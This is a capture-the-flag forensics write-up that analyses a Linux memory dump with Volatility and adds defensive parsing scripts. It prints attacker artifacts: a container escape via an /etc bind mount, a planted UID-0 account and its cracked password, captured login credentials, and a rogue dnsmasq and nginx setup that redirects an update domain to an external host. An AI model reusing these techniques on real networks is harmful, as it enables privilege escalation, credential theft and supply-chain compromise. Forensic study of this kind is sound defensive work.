A memory dump from a connected Linux machine reveals covert network connections, fake services, and unusual redirects. Holmes investigates further to uncover how the attacker is manipulating the entire network!
What is the Linux kernel version of the provided image? (string)
Use volatility3:
$ vol -f ../memdump.mem banners.Banner
Volatility 3 Framework 2.27.0
Progress: 100.00 PDB scanning finished
Offset Banner
0x67200200 Linux version 5.10.0-35-amd64 (debian-kernel@lists.debian.org) (gcc-10 (Debian 10.2.1-6) 10.2.1 20210110, GNU ld (GNU Binutils for Debian) 2.35.2) #1 SMP Debian 5.10.237-1 (2025-05-19)
0x7f40ba40 Linux version 5.10.0-35-amd64 (debian-kernel@lists.debian.org) (gcc-10 (Debian 10.2.1-6) 10.2.1 20210110, GNU ld (GNU Binutils for Debian) 2.35.2) #1 SMP Debian 5.10.237-1 (2025-05-19)
Volatility 3 needs an ISF symbol file that matches this exact kernel build (Debian 5.10.0-35-amd64, package 5.10.237-1); without it the Linux plugins cannot walk kernel structures. Download it into the symbols directory:
cd volatility3/symbols/linux/
wget "https://github.com/Abyss-W4tcher/volatility3-symbols/raw/refs/heads/master/Debian/amd64/5.10.0/35/Debian_5.10.0-35-amd64_5.10.237-1_amd64.json.xz"
The attacker connected over SSH and executed initial reconnaissance commands. What is the PID of the shell they used? (number)
Use volatility3:
$ vol -vvv -f ../memdump.mem linux.bash.Bash
13608 bash 2025-09-03 08:16:48.000000 UTC id
13608 bash 2025-09-03 08:16:52.000000 UTC
13608 bash 2025-09-03 08:16:52.000000 UTC cat /etc/os-release
13608 bash 2025-09-03 08:16:58.000000 UTC uname -a
13608 bash 2025-09-03 08:17:02.000000 UTC ip a
13608 bash 2025-09-03 08:17:04.000000 UTC 0
13608 bash 2025-09-03 08:17:04.000000 UTC ps aux
13608 bash 2025-09-03 08:17:25.000000 UTC docker run -v /etc/:/mnt -it alpine
13608 bash 2025-09-03 08:18:11.000000 UTC su jm
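The Bash plugin gives a flat timeline, and on a busy host several shells will be interleaved. The script below is an added example (not part of the writeup or of Volatility): it parses rows in the layout shown above, groups them per shell PID, scores each shell against the classic first-minute reconnaissance set (identity, OS, network, processes) and flags privilege-changing or container-escape commands. The regexes and the category names are my own choices; the benign PID 4021 session in the sample is constructed.

```python
"""Triage Volatility 3 linux.bash.Bash output for reconnaissance sessions.

Added example (not from the original writeup or from Volatility): parses
the flattened `PID Process CommandTime Command` rows, groups them per
shell PID and scores each shell for classic post-access recon.
"""
import re
from collections import defaultdict
from datetime import datetime, timezone

# Row layout as printed by linux.bash.Bash: PID, process, timestamp, command.
ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<proc>\S+)\s+"
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ UTC\s*(?P<cmd>.*)$"
)

# Commands an intruder typically runs right after landing. Anchored on the
# first token so `id` does not match `identify` and `ps` does not match `psql`.
RECON = {
    "identity": re.compile(r"^(id|whoami|w|who)\b"),
    "os": re.compile(r"^(uname\b|cat /etc/(os-release|issue|\*release)|hostnamectl)"),
    "network": re.compile(r"^(ip (a|addr|r|route)\b|ifconfig|ss\b|netstat)"),
    "processes": re.compile(r"^(ps\b|top\b)"),
}
# Actions that change privilege or bind host paths into a container.
ESCALATION = re.compile(r"^(su\b|sudo\b|docker run .*-v\s+/etc)")

def parse_rows(text):
    """Yield one dict per Bash-plugin row; rows that do not parse are skipped."""
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        yield {
            "pid": int(m["pid"]),
            "time": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc),
            "cmd": m["cmd"].strip(),
        }

def score_sessions(rows):
    """Return {pid: {"recon": set(categories), "escalation": [cmds], "first": datetime}}."""
    sessions = defaultdict(lambda: {"recon": set(), "escalation": [], "first": None})
    for r in rows:
        s = sessions[r["pid"]]
        s["first"] = r["time"] if s["first"] is None else min(s["first"], r["time"])
        for name, pat in RECON.items():
            if pat.search(r["cmd"]):
                s["recon"].add(name)
        if ESCALATION.search(r["cmd"]):
            s["escalation"].append(r["cmd"])
    return dict(sessions)

def recon_shells(sessions, min_categories=3):
    """PIDs whose shell hit at least `min_categories` recon categories, oldest first."""
    hits = [pid for pid, s in sessions.items() if len(s["recon"]) >= min_categories]
    return sorted(hits, key=lambda pid: sessions[pid]["first"])

# Constructed sample: the rows from the dump above plus a benign admin shell (PID 4021).
SAMPLE = """\
13608 bash 2025-09-03 08:16:48.000000 UTC id
13608 bash 2025-09-03 08:16:52.000000 UTC 
13608 bash 2025-09-03 08:16:52.000000 UTC cat /etc/os-release
13608 bash 2025-09-03 08:16:58.000000 UTC uname -a
13608 bash 2025-09-03 08:17:02.000000 UTC ip a
13608 bash 2025-09-03 08:17:04.000000 UTC 0
13608 bash 2025-09-03 08:17:04.000000 UTC ps aux
13608 bash 2025-09-03 08:17:25.000000 UTC docker run -v /etc/:/mnt -it alpine
13608 bash 2025-09-03 08:18:11.000000 UTC su jm
4021 bash 2025-09-03 07:59:10.000000 UTC systemctl status nginx
4021 bash 2025-09-03 07:59:30.000000 UTC tail -n 50 /var/log/syslog
"""

if __name__ == "__main__":
    sessions = score_sessions(parse_rows(SAMPLE))
    for pid in recon_shells(sessions):
        s = sessions[pid]
        print(pid, s["first"].isoformat(), sorted(s["recon"]), s["escalation"])
```

Feed it `vol -f memdump.mem linux.bash.Bash` output on stdin and the recon shell falls out as PID 13608, together with the two escalation commands (`docker run -v /etc/:/mnt ...` and `su jm`) that explain the next question.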
After the initial information gathering, the attacker authenticated as a different user to escalate privileges. Identify and submit that user's credentials. (user:password)
Use volatility3:
$ vol -vvv -f ../memdump.mem linux.pagecache.RecoverFs
$ unar recovered_fs.tar.gz
$ cat ./recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/etc/passwd
jm:$1$jm$poAH2RyJp8ZllyUvIkxxd0:0:0:root:/root:/bin/bash
Two things stand out in this entry. The account has UID 0 and GID 0, so `su jm` yields a root shell under a different name, and the password hash is stored inline in /etc/passwd instead of the usual `x` that defers to /etc/shadow. That is consistent with the attacker writing the line through the `docker run -v /etc/:/mnt -it alpine` bind mount seen in the bash history. The `$1$` prefix identifies md5crypt, which is hashcat mode 500:
$ echo '$1$jm$poAH2RyJp8ZllyUvIkxxd0' > jm.hash
$ hashcat -O -a 0 -m 500 jm.hash ~/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
$ hashcat --show -m 500 jm.hash
$1$jm$poAH2RyJp8ZllyUvIkxxd0:WATSON0
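Checking a recovered /etc/passwd by eye works for a CTF image; on a real host you want the two conditions above (UID 0 under another name, hash stored inline) tested mechanically. The following is an added example, not code from the writeup: it parses passwd entries, reports both findings, and maps the crypt(3) prefix to the hashcat mode to use. The prefix-to-mode table covers only the modes I am certain of (500, 7400, 1800, 3200); anything else is reported as unknown. The sample passwd is constructed around the `jm` line from the image.

```python
"""Audit a recovered /etc/passwd for backdoor accounts.

Added example (not from the writeup): flags entries that have UID 0 but
are not `root`, entries that carry a password hash inline instead of the
`x` that defers to /etc/shadow, and maps the crypt(3) prefix to the
hashcat -m mode needed to crack it.
"""
import re

# crypt(3) identifier -> hashcat mode. Only well-known modes are listed;
# other prefixes (e.g. yescrypt "$y$") are reported as unknown.
HASHCAT_MODE = {"$1$": 500, "$5$": 7400, "$6$": 1800, "$2b$": 3200, "$2y$": 3200}

def hash_type(field):
    """Return (prefix, hashcat_mode_or_None) for an inline hash, else None."""
    if field in ("x", "*", "") or field.startswith("!"):   # shadowed, disabled or locked
        return None
    m = re.match(r"^(\$[^$]+\$)", field)
    if not m:
        return None
    return m.group(1), HASHCAT_MODE.get(m.group(1))

def parse_passwd(text):
    """Parse passwd(5) lines into dicts; raise on a malformed line."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"line {n}: expected 7 fields, got {len(parts)}")
        user, pw, uid, gid, _gecos, home, shell = parts
        entries.append({"user": user, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries

def audit(entries):
    """Return (user, finding) tuples for every suspicious passwd entry."""
    findings = []
    for e in entries:
        if e["uid"] == 0 and e["user"] != "root":
            findings.append((e["user"], "uid 0 alias of root"))
        ht = hash_type(e["pw"])
        if ht:
            prefix, mode = ht
            mode_str = str(mode) if mode is not None else "?"
            findings.append((e["user"], f"inline hash {prefix} (hashcat -m {mode_str})"))
    return findings

# Constructed sample: a normal passwd plus the backdoor line recovered above.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jm:$1$jm$poAH2RyJp8ZllyUvIkxxd0:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

if __name__ == "__main__":
    for user, finding in audit(parse_passwd(SAMPLE)):
        print(f"{user}: {finding}")
```

Running it against `recovered_fs/<uuid>/etc/passwd` prints the two findings for `jm` and the exact `-m` value to hand to hashcat.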
The attacker downloaded and executed code from Pastebin to install a rootkit. What is the full path of the malicious file? (/path/filename.ext)
Use volatility3:
$ vol -f ../memdump.mem linux.malware.hidden_modules.Hidden_modules
Volatility 3 Framework 2.27.0
Progress: 100.00 Stacking attempts finished
Offset Module Name Code Size Taints Load Arguments File Output
0xffffc0aa0040 Nullincrevenge 0x4000 OOT_MODULE,UNSIGNED_MODULE N/A
/usr/lib/modules/5.10.0-35-amd64/kernel/lib/Nullincrevenge.ko
$ find . | grep revenge
./recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/usr/lib/modules/5.10.0-35-amd64/kernel/lib/Nullincrevenge.ko
What is the email account of the alleged author of the malicious file? (user@example.com)
Use modinfo:
$ /sbin/modinfo ./recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/usr/lib/modules/5.10.0-35-amd64/kernel/lib/Nullincrevenge.ko
filename: /home/jiegec/ctf/holmesctf2025/volatility3/./recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/usr/lib/modules/5.10.0-35-amd64/kernel/lib/Nullincrevenge.ko
description: NULLINC REVENGE IS COMING...
license: GPL
author: i-am-the@network.now
depends:
retpoline: Y
name: Nullincrevenge
vermagic: 5.10.0-35-amd64 SMP mod_unload modversions
The next step in the attack involved issuing commands to modify the network settings and installing a new package. What is the name and PID of the package? (package name,PID)
From the bash history. These commands appear under a different shell PID (22714), presumably the root shell spawned by `su jm`, rather than the initial 13608:
$ vol -vvv -f ../memdump.mem linux.bash.Bash
22714 bash 2025-09-03 08:20:31.000000 UTC apt install -y dnsmasq
22714 bash 2025-09-03 08:20:50.000000 UTC rm /etc/dnsmasq.conf
22714 bash 2025-09-03 08:20:56.000000 UTC nano /etc/dnsmasq.conf
22714 bash 2025-09-03 08:21:23.000000 UTC systemctl enable --now dnsmasq
22714 bash 2025-09-03 08:21:30.000000 UTC systemctl restart dnsmasq
$ vol -f ../memdump.mem linux.psaux.PsAux
38687 1 dnsmasq /usr/sbin/dnsmasq -x /run/dnsmasq/dnsmasq.pid -u dnsmasq -7 /etc/dnsmasq.d,.dpkg-dist,.dpkg-old,.dpkg-new --local-service --trust-anchor=.,20326,8,2,E06D44B80B8F1D39A95C0B0D7C65D08458E880409BBC683457104237C7F8EC8D --trust-anchor=.,38696,8,2,683D2D0ACB8C9B712A1948B27F741219298D0A450D612C483AF444A4C0FB2B16
Clearly, the attacker's goal is to impersonate the entire network. One workstation was already tricked and got its new malicious network configuration. What is the workstation's hostname?
From the recovered fs. Each line of dnsmasq.leases holds the lease expiry as a Unix timestamp, the client MAC, the assigned IP, the hostname the client reported, and the client identifier:
$ cat recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/var/lib/misc/dnsmasq.leases
1:1756891471 00:50:56:b4:32:cd 192.168.211.52 Parallax-5-WS-3 01:00:50:56:b4:32:cd
After receiving the new malicious network configuration, the user accessed the City of CogWork-1 internal portal from this workstation. What is their username? (string)
Search for HTTP requests in the memory dump. The portal login is a plain-HTTP POST, so the form body is present in cleartext:
POST /index.php HTTP/1.1
Host: 10.129.232.25:8081
Connection: keep-alive
Content-Length: 43
Cache-Control: max-age=0
Origin: http://10.129.232.25:8081
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.232.25:8081/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=189b027ab0e5e10f496e57953544cd74

username=mike.sullivan&password=Pizzaaa1%21
The body is URL-encoded (`%21` is `!`, so the password is `Pizzaaa1!`); the username asked for is `mike.sullivan`.
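Grepping `strings` output loses the request body whenever a header or the body contains bytes `strings` splits on. The script below is an added example, not part of the writeup: it scans the image as raw bytes for request lines, reads headers up to the blank line, honours Content-Length for the body, and decodes a urlencoded login form. The `username`/`user` and `password`/`pass` field names it looks for are assumptions; the sample blob is constructed from the request above with junk on either side.

```python
"""Carve HTTP requests, including bodies, out of a raw memory image.

Added example, not part of the original writeup: finds request lines in a
bytes blob, parses headers up to the blank line, reads Content-Length
bytes of body and decodes application/x-www-form-urlencoded credentials.
"""
import re
from urllib.parse import parse_qs

REQUEST_LINE = re.compile(
    rb"(?:GET|POST|PUT|HEAD|DELETE|OPTIONS|PATCH) /[^\r\n]{0,2048} HTTP/1\.[01]\r\n"
)
MAX_HEADERS = 16 * 1024   # give up on a hit whose header block never terminates
MAX_BODY = 64 * 1024      # cap absurd Content-Length values from torn pages

def carve_requests(blob):
    """Yield dicts with offset, method, path, lower-cased headers and body bytes."""
    for m in REQUEST_LINE.finditer(blob):
        start = m.start()
        hdr_end = blob.find(b"\r\n\r\n", start)
        if hdr_end == -1 or hdr_end - start > MAX_HEADERS:
            continue
        head = blob[start:hdr_end].decode("latin-1").split("\r\n")
        method, path, _version = head[0].split(" ", 2)
        headers = {}
        for h in head[1:]:
            k, _, v = h.partition(":")
            headers[k.strip().lower()] = v.strip()
        try:
            length = min(int(headers.get("content-length", "0")), MAX_BODY)
        except ValueError:
            length = 0
        body_start = hdr_end + 4
        yield {"offset": start, "method": method, "path": path,
               "headers": headers, "body": bytes(blob[body_start:body_start + length])}

def form_credentials(req):
    """Return (username, password) from a urlencoded login body, else None.

    Field names are an assumption; adjust for the portal under analysis."""
    if "application/x-www-form-urlencoded" not in req["headers"].get("content-type", ""):
        return None
    fields = parse_qs(req["body"].decode("latin-1"), keep_blank_values=True)
    user = (fields.get("username") or fields.get("user") or [None])[0]
    pw = (fields.get("password") or fields.get("pass") or [None])[0]
    if user is None or pw is None:
        return None
    return user, pw   # parse_qs already turns %21 into "!"

# Constructed sample: the login POST seen above, surrounded by junk, followed by a GET.
SAMPLE = (
    b"\x00\x00junk\xff\xfe"
    b"POST /index.php HTTP/1.1\r\n"
    b"Host: 10.129.232.25:8081\r\n"
    b"Content-Length: 43\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Cookie: PHPSESSID=189b027ab0e5e10f496e57953544cd74\r\n"
    b"\r\n"
    b"username=mike.sullivan&password=Pizzaaa1%21"
    b"\x00\x00trailing garbage"
    b"GET /index.php HTTP/1.1\r\nHost: 10.129.232.25:8081\r\n\r\n"
)

if __name__ == "__main__":
    import mmap, sys
    if len(sys.argv) > 1:   # real image: map it instead of reading it all
        with open(sys.argv[1], "rb") as f, mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mm:
            reqs = list(carve_requests(mm))
    else:
        reqs = list(carve_requests(SAMPLE))
    for r in reqs:
        print(hex(r["offset"]), r["method"], r["headers"].get("host"), r["path"], form_credentials(r))
```

With the real image as argument (`python3 carve.py memdump.mem`) it prints every carved request with its offset, which also gives you a pointer into the dump to look for neighbouring artifacts such as the response.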
Finally, the user updated a software to the latest version, as suggested on the internal portal, and fell victim to a supply chain attack. From which Web endpoint was the update downloaded?
Grep for HTTP requests. The hit is not the request itself but a web-server access-log line sitting in memory. The client, 192.168.211.52, is the address the rogue DHCP server leased to Parallax-5-WS-3, and the User-Agent shows the old AetherDesk 73.0 client fetching the "update":
$ strings ../memdump.mem | grep "GET "
192.168.211.52 - - [03/Sep/2025:08:25:48 +0000] "GET /win10/update/CogSoftware/AetherDesk-v74-77.exe HTTP/1.1" 200 12084 "-" "AetherDesk/73.0 (Windows NT 10.0; Win64; x64)" "-"
To perform this attack, the attacker redirected the original update domain to a malicious one. Identify the original domain and the final redirect IP address and port. (domain,IP:port)
From the recovered fs. The dnsmasq config hands every DHCP client 192.168.211.8 as both default gateway (option 3) and DNS server (option 6), and the `address=` line pins the update domain to that same host, so the workstation's lookup of updates.cogwork-1.net resolved to the attacker's machine:
$ cat recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/etc/dnsmasq.conf
interface=ens224
dhcp-range=192.168.211.30,192.168.211.240,1h
dhcp-option=3,192.168.211.8
dhcp-option=6,192.168.211.8
no-hosts
no-resolv
server=8.8.8.8
address=/updates.cogwork-1.net/192.168.211.8
log-queries=no
quiet-dhcp
quiet-dhcp6
log-facility=/dev/null
The nginx site config staged in /tmp shows what that host did with the traffic: anything arriving on port 80 is proxied to the final hop, with a fixed Host header:
$ cat recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/tmp/default.conf
server {
listen 80;
location / {
proxy_pass http://13.62.49.86:7477/;
proxy_set_header Host jm_supply;
}
}
So the original update domain is updates.cogwork-1.net, redirected first to the rogue resolver's own address 192.168.211.8 and from there to 13.62.49.86:7477 (in the requested format: updates.cogwork-1.net,13.62.49.86:7477).
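Three small files (dnsmasq.conf, dnsmasq.leases and the nginx site config) carry the whole redirect chain. The script below is an added example, not part of the writeup: it parses the DHCP options and `address=` pins from dnsmasq.conf, the `proxy_pass` upstreams from the nginx config, and the lease table, then joins them into domain, rogue IP, final upstream. The inputs are the files shown above, embedded verbatim; the assumption that the pinned IP is the nginx host itself (true on this box) is stated in the code.

```python
"""Join the recovered dnsmasq and nginx configs into the redirect chain.

Added example, not part of the original writeup: parses dnsmasq.conf for
DHCP options and address= pins, dnsmasq.leases for the victims, and the
nginx site config for the proxy_pass target.
"""
import re
from datetime import datetime, timezone

PROXY_PASS = re.compile(
    r"proxy_pass\s+(?P<scheme>https?)://(?P<host>[^/:;\s]+)(?::(?P<port>\d+))?"
)

def parse_dnsmasq_conf(text):
    """Return numeric dhcp-options, address= pins and upstream servers."""
    cfg = {"interface": None, "dhcp_options": {}, "pins": {}, "upstream_dns": []}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        key, _, value = line.partition("=")
        if key == "interface":
            cfg["interface"] = value
        elif key == "dhcp-option":
            opt, _, val = value.partition(",")
            if opt.isdigit():                 # "option:router" spellings not handled here
                cfg["dhcp_options"][int(opt)] = val
        elif key == "address":
            parts = value.strip("/").split("/")
            if len(parts) >= 2:               # "address=/dom/" alone is an NXDOMAIN sink
                for dom in parts[:-1]:
                    cfg["pins"][dom] = parts[-1]
        elif key == "server":
            cfg["upstream_dns"].append(value)
    return cfg

def parse_proxy_targets(text):
    """All proxy_pass upstreams as host:port, defaulting the port by scheme."""
    return [
        f"{m['host']}:{m['port'] or ('443' if m['scheme'] == 'https' else '80')}"
        for m in PROXY_PASS.finditer(text)
    ]

def parse_leases(text):
    """dnsmasq.leases rows: expiry epoch, MAC, IP, hostname, client-id."""
    leases = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        expiry = parts[0].rsplit(":", 1)[-1]  # tolerate a grep -n style "N:" prefix
        leases.append({
            "expires": datetime.fromtimestamp(int(expiry), tz=timezone.utc),
            "mac": parts[1], "ip": parts[2], "hostname": parts[3],
            "client_id": parts[4] if len(parts) > 4 else None,
        })
    return leases

def rogue_servers(cfg):
    """Gateway (option 3) and DNS (option 6) pushed to clients."""
    return {k: cfg["dhcp_options"].get(k) for k in (3, 6)}

def redirect_chain(cfg, proxy_targets):
    """domain -> (IP the rogue resolver answers with, nginx upstream).

    Assumes the pinned IP is the host running nginx, as it is on this box."""
    final = proxy_targets[0] if proxy_targets else None
    return {dom: (ip, final) for dom, ip in cfg["pins"].items()}

# Inputs copied from the recovered filesystem shown above.
DNSMASQ_CONF = """\
interface=ens224
dhcp-range=192.168.211.30,192.168.211.240,1h
dhcp-option=3,192.168.211.8
dhcp-option=6,192.168.211.8
no-hosts
no-resolv
server=8.8.8.8
address=/updates.cogwork-1.net/192.168.211.8
log-queries=no
quiet-dhcp
quiet-dhcp6
log-facility=/dev/null
"""
NGINX_CONF = """\
server {
    listen 80;
    location / {
        proxy_pass http://13.62.49.86:7477/;
        proxy_set_header Host jm_supply;
    }
}
"""
LEASES = "1:1756891471 00:50:56:b4:32:cd 192.168.211.52 Parallax-5-WS-3 01:00:50:56:b4:32:cd\n"

if __name__ == "__main__":
    cfg = parse_dnsmasq_conf(DNSMASQ_CONF)
    print("rogue gateway/dns:", rogue_servers(cfg))
    print("chain:", redirect_chain(cfg, parse_proxy_targets(NGINX_CONF)))
    for lease in parse_leases(LEASES):
        print("victim:", lease["hostname"], lease["ip"], "lease expires", lease["expires"].isoformat())
```

The lease expiry decodes to 2025-09-03 09:24:31 UTC; with the configured 1h lease time that places the DHCP handout around 08:24, a minute before the 08:25:48 download in the access log, which ties the workstation, the rogue resolver and the proxied update together on one timeline.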